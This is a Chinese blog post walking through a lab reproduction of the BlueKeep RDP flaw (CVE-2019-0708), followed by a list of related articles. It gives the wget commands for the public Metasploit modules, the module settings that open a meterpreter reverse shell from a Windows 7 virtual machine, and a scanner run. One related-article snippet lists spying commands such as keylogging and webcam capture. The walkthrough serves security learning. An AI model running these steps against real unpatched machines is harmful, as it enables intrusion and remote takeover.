【漏洞复现】RDP远程桌面漏洞复现(CVE-2019-0708)

最新推荐文章于 2025-03-20 13:00:00 发布
最新推荐文章于 2025-03-20 13:00:00 发布
阅读量1.1w 收藏 89
点赞数 8
分类专栏: 漏洞复现 文章标签: windowst系统安全 windows 网络安全 web安全 渗透测试
原文链接:https://xie1997.blog.csdn.net/article/details/83215257
版权

一、CVE-2019-0708:

1. 漏洞背景:

  9.7号凌晨一点多,开发者@rapid7在Github上放出了windows 远程桌面服务 RCE漏洞(CVE-2019-0708)exp。一大早醒来,朋友圈就被各大公司安全预警给刷了屏,趁着上午,立马把该exp复现了一波。

2. 漏洞影响Windows版本:

  • Windows XP SP3 x86
  • Windows XP Professional x64 Edition SP2
  • Windows XP Embedded SP3 x86
  • Windows Server 2003 SP2 x86
  • Windows Server 2008 for Itanium-Based Systems Service Pack 2
  • Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows 7 for x64-based Systems Service Pack 1
  • Windows 7 for 32-bit Systems Service Pack 1
  • Windows Server 2003 x64 Edition SP2
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1
  • Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows 8和Windows 10及之后版本的用户不受此漏洞影响。

3. 漏洞环境:

靶   机: Win7(X64,SP1)虚拟机:192.168.10.16
          Windows Server 2008 SP2 DataCenter(X64)虚拟机:192.168.10.15 (不在漏洞范围内)

攻 击 机: kali虚拟机:192.168.10.11

二:复现过程:

1、在Kali主机上下载相关的rb文件
命令:

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

2、将这些主机文件复制到MSF的相应目录下(其实,主要的攻击文件只有一个:cve_2019_0708_bluekeep_rce.rb,其他几个文件可有可无)。

注:有可能你的MSF的目录不一样,这就需要你自己查找相应的目录。
命令:

# 正常的kali是下面这些命令,因为MSF是装在 /usr/share目录下:
cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/
cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/    #这里有可能提示不存在这个目录,我们去相应的目录下新建rdp文件夹即可
cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
 
# 这里因为我的MSF是更新后的,装在 /opt 目录下,所以,我是下面这几个命令
cp rdp.rb  /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit
cp rdp_scanner.rb  /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner
cp cve_2019_0708_bluekeep_rce.rb   /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp  #这里有可能提示不存在这个目录,我们去相应的目录下新建rdp文件夹即可
cp cve_2019_0708_bluekeep.rb  /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp

3、进入MSF,重载模块:reload_all

4、查找漏洞利用模块,进入模块
命令:

search 0708
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

5、查看targets

6、设置参数
命令:

set payload windows/x64/meterpreter/reverse_tcp      #设置payload
set rhosts 192.168.10.16                             #目标机ip
set lhost 192.168.10.11              				 #攻击机ip
set rdp_client_ip 192.168.10.16      				 #目标机ip
unset RDP_CLIENT_NAME               				 #取消设置这个参数
set target 2    									 #这里我是vmware的虚拟机,按理来说target应该是设置为3,但是设置为3没打成功,设置为2打成功了

7、攻击成功,成功拿到目标机反弹回来的shell。

注:
按照这个步骤,攻击Windows Server 2008R2蓝屏。看网上说貌似是要改注册表,需要修改注册表:
  HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\rdpwd\fDisableCam值修改为0。但是我的这个DataCenter的Server2008R2没有这个注册表。而且好像貌似 DataCenter的Server 2008R2并不在漏洞影响系统之内,所以打成蓝屏了。
  看了网上很多人的文章,也都是说打的蓝屏。总的来说,这个漏洞的质量并没有MS17_010永恒之蓝的高,没打成就变成蓝屏了。而且利用起来貌似限制蛮多的。单核服务器上成功率约90%, 双核上 40-60%, 四核上10%,如果失败,目标系统会蓝屏。

三、内网利用:

1、更新于MSF中已有该利用模块:

2、进行漏洞探测:
命令:

use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set RDP_CLIENT_IP 10.8.13.25
set RHOSTS 10.8.13.25
run

在这里插入图片描述

参考文章:
https://github.com/rapid7/metasploit-framework/pull/12283?from=groupmessage&isappinstalled=0
CVE-2019-0708/1181/1182:Windows RDP服务蠕虫级漏洞修复指南(Version 3.0
【预警通告】Windows远程桌面服务远程代码执行漏洞(CVE-2019-0708)EXP披露预警

RDP远程桌面漏洞复现(CVE-2019-0708)
谢公子的博客
09-07 6262
9.7号凌晨一点多,开发者 @rapid7在Github上放出了windows远程桌面服务RCE漏洞(CVE-2019-0708)的exp。一大早醒来,朋友圈就被各大公司安全预警给刷了屏,趁着上午,立马把该exp复现了一波。 漏洞影响Windows版本: Windows XP SP3 x86 Windows XP Professional x64 Edition SP2 Windows...
[漏洞挖掘与防护] 01.漏洞利用之CVE-2019-0708复现及防御详解(含学习路线)
杨秀璋的专栏
07-10 1361
这是作者新开的一个专栏——“漏洞挖掘与防护”。第一篇文章将详细介绍Windows远程桌面服务漏洞CVE-2019-0708),该高危漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击,堪比WannaCry。希望对入门的同学有帮助。您的点赞、评论、收藏将是对我最大的支持,感恩安全路上一路前行,如果有写得不好的地方,可以联系我修改。基础性文章,希望对您有所帮助!
CVE-2019-0708远程桌面服务RCE)漏洞复现(超详细Getshell)
unlash的博客
10-28 1万+
CVE-2019-0708远程桌面服务RCE)漏洞复现(超详细Getshell) 漏洞介绍 漏洞修复 复现条件
CVE-2019-0708漏洞利用
最新发布
键盘上温暖而又美好的时光 .
03-20 516
通过利用远程桌面的3389端口,RDP协议进行攻击,从而导致机器被利用。
Windows远程桌面代码执行漏洞复现(CVE-2019-0708)
whh6tl的博客
07-25 4644
漏洞简介: 2019年5月14日微软官方发布安全补丁,修复了windows远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证且无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用。利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机。 威胁类型 远程代码执行 威胁等级 高 漏洞编号 CVE-2019-0708 受影响系统及应用版本 Windows 7 Windows server 2008 R2 Windows server 2008
CVE-2019-0708 漏洞复现
qq_40860153的博客
05-11 1533
存在漏洞远程桌面服务器,在接收到特殊数据包时会释放一个内部信道 MS_T120 的控制结构体,但并未将指向该结构体的指针删除,而且在远程桌面连接结束之后还会调用 MS_T120 结构体内的一个函数指针,若攻击者可通过远程发送数据重新占据被释放的 MS_T120,并为结构体内的函数指针赋恰当的值,即可实现远程命令执行。4、可以看到攻击完成,但是没有成功创建会话,通过分析告警提示,是需要指定一下目标攻击框架,这里再设置一下攻击框架,再发起攻击就可以成功获取到会话了。攻击机:192.168.0.1。
cve-2019-0708远程桌面代码执行漏洞复现
明哥哥知识分享
11-05 1000
1.影响版本 Windows 7 Windows Server 2008 R2 Windows Server 2008 Windows 2003 Windows XP 2.漏洞描述 Microsoft Windows中存在远程桌面执行代码漏洞,该漏洞源于Microsoft Remote Desktop Services中存在输入验证错误漏洞,网络系统或产品未对输入的数据进行正确的验证。当未经身份验证的攻击者使用 RDP 连接到目标系统并发送经特殊设计的请求时,远程桌面服务(以前称为“终端服务”)中存在
漏洞复现远程桌面服务(RDP)远程代码执行漏洞(CVE-2019-0708)
VI___
01-28 940
一、CVE-2019-0708 远程桌面协议(RDP)本身不容易收到攻击,此漏洞是预身份验证,无需用户交互。利用该漏洞,攻击者可安装程序、查看、更改或删除数据、或者创建拥有完全用户权限的新帐户。 影响范围: Windows 7 Windows Server 2008 R2 Windows Server 2008 Windows Server 2003(已停止维护) Windo...
CVE-2019-0708远程桌面漏洞复现
weixin_43806577的博客
08-26 5728
一、CVE-2019-0708漏洞简介 CVE-2019-0708漏洞被称为“永恒之蓝”级别的漏洞,只要开启Windows远程桌面服务(RDP服务)即可被攻击。 二、测试环境 Kali虚拟机、Windows Server 2008 R2 64位(Windows服务器需开启远程桌面服务)、windows 7 64位(开启远程桌面服务) 三、测试过程 (1)查看IP Kali的IP地址为1...
Kali--MSF(CVE-2019-0708漏洞复现
weixin_53946822的博客
08-25 651
出现你就已经成功的入侵的对方的电脑监控靶机电脑屏幕keyscan_start 开始捕获击键(开始键盘记录)keyscan_dump 转储按键缓冲(下载键盘记录)keyscan_stop 停止捕获击键(停止键盘记录)record_mic X秒从默认的麦克风record_mic音频记录(音频录制)webcam_chat 开始视频聊天(视频,对方会有弹窗)webcam_list 单摄像头(查看摄像头列表)webcam_snap 采取快照从指定的摄像头(摄像头拍摄一张照片)
[系统安全] 八.Windows漏洞利用之CVE-2019-0708复现及防御详解
热门推荐
杨秀璋的专栏
12-27 1万+
娜璋AI安全之家于2020年8月18日开通,将专注于Python和安全技术,主要分享Web渗透、系统安全CVE复现、威胁情报分析、人工智能、大数据分析、恶意代码检测等文章。真心想把自己近十年的所学所做所感分享出来,与大家一起进步。 系统安全系列作者将深入研究恶意样本分析、逆向分析、漏洞利用、攻防实战等,通过在线笔记和实践操作的形式分享与博友们学习。前文通过编写程序实现获取Windows系统目录文件,并对其进行加密和解密的过程。这篇文章将详细介绍Windows远程桌面服务漏洞CVE-2019-0708),
CVE-2019-0708远程桌面服务远程执行代码漏洞复现
Welcome To Myon'Blog !
12-22 1698
CVE-2019-0708 远程桌面服务远程执行代码漏洞复现
windows RDP远程代码执行_CVE-2019-0708漏洞复现
weixin_48900801的博客
07-28 1043
windows RDP远程代码执行_CVE-2019-0708漏洞复现 一、漏洞描述 Windows系列服务器于2019年5月15号,被爆出高危漏洞,该漏洞影响范围较广,漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的。这个漏洞是危害严重性最大的漏洞,跟之前的勒索,永恒之蓝病毒差不多。 微软官方紧急发布安全补丁,修复了一个Windows远程桌面服务的远程代码执行漏洞(CVE-2019-0708),该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证,无需用户交互。当未经身份验证的攻击者
Windows CVE-2019-0708 远程桌面代码执行漏洞复现
WY92139010的博客
09-08 1021
Windows CVE-2019-0708 远程桌面代码执行漏洞复现 一、漏洞说明 2019年5月15日微软发布安全补丁修复了CVE编号为CVE-2019-0708Windows远程桌面服务(RDP)远程代码执行漏洞,该漏洞在不需身份认证的情况下即可远程触发,危害与影响面极大。 目前,9月7日EXP代码已被公开发布至metasploit-framework的Pull reques...
漏洞复现CVE-2019-0708(BlueKeep)
weixin_45632448的博客
06-14 4025
2019年5月14日微软官方发布安全补丁,修复了 Windows 远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的 Windows 系统。此漏洞是预身份验证,无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用,与2017年 WannaCry 勒索病毒的传播方式类似。存在漏洞远程桌面服务器,在接收到特殊数据包时会释放一个内部信道 MS_T120 的控制结构体,但并未将指向该结构体的指针删除,而且在远程桌面连接结束之后还会调用 MS_T120 结构体内的一个函数指针,若攻击者可通过远程发送数
漏洞复现----CVE-2019-0708-RDP远程代码执行高危漏洞复现及利用
wwl012345的博客
08-22 3848
一、事件背景 2019年5月14日微软官方发布安全补丁,修复了Windows远程桌面服务的远程代码执行漏洞(CVE-2019-0708),该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证且无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用。利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机,其方式与2017年WannaCry恶意软件的传播方式类似。微...
漏洞复现-Windows RDL存在远程代码执行漏洞CVE-2024-38077)
玄道的网安博客
08-17 1469
在启用远程桌面服务(RDS)的环境中,RDL确保服务器拥有足够的授权许可证,以便允许多个用户或设备通过RDP同时连接到该服务器。当客户端尝试通过RDP连接到具有远程桌面服务的服务器时,RDL会验证并分配适当的许可证,以确保用户遵循许可协议。是Windows 远程桌面授权服务,RDL 服务并非默认启用,但许多管理员会手动启用它来扩展功能,例如增加远程桌面会话的数量。该漏洞在解码用户输入的许可密钥包时,未正确验证解码后的数据长度与缓冲区大小之间的关系,从而导致缓冲区溢出。
RDP漏洞CVE-2019-0708无损扫描GUI工具发布
结合以上知识点,可以了解到该压缩包文件提供的“RDP漏洞[ CVE-2019-0708 ]无损扫描工具GUI”是一个用于检测Windows系统中CVE-2019-0708漏洞安全工具,并且附带了图形用户界面。由于该漏洞影响严重,可以被用于大...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值